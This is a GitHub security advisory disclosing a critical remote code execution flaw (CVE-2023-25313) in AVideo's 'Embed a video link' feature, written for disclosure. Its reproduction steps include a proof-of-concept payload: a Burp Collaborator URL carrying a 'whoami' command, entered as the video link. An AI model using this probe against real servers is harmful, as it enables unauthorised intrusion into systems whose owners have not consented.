Skip to content

RCE when embedding a video link

Critical
DanielnetoDotCom published GHSA-pgvh-p3g4-86jw Jan 31, 2023

Package

No package listed

Affected versions

< 12.3

Patched versions

12.4

Description

Description:

I found a very critical vulnerability on your open source program called RCE (Remote Code Execution) where an attacker can arbitrary execute code in the server

Impact:

An attacker could execute remote codes on your system

Step to Reproduce:

  1. Go to My Videos tab

https://demo.avideo.com/mvideos

  1. Click "Embed a video link"

  2. Get your Burp Suite Collaborator link

Example:

o4ta880iz4vap09kaqw400po8fe52u.oastify.com

  1. Now put this RCE payload in the Video Link field

http://o4ta880iz4vap09kaqw400po8fe52u.oastify.com?whoami

then click Save

  1. Now go to BurpSuite Collaborator client and see the response

Video POC: https://youtu.be/aN8JZVc5zFM

Credits

Severity

Critical

CVE ID

CVE-2023-25313

Weaknesses

No CWEs

Credits